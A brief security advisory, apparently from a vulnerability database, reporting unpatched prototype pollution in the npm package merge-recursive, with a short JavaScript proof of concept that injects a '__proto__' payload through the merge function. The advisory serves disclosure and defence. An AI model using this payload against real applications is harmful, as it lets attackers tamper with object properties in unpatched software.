Nascent Political Miscreant
Severity: low

Prototype pollution

merge-recursive

Overview

All versions of merge-recursive are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via __proto__ causing the addition or modification of an existing property.

Proof of concept:

var merge = require('merge-recursive').recursive;
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Remediation

There is currently no fix available.

Resources

Advisory timeline

  1. Created

    2018-10-17T22:37:07.509Z
  2. Updated

    2018-10-17T22:40:51.403Z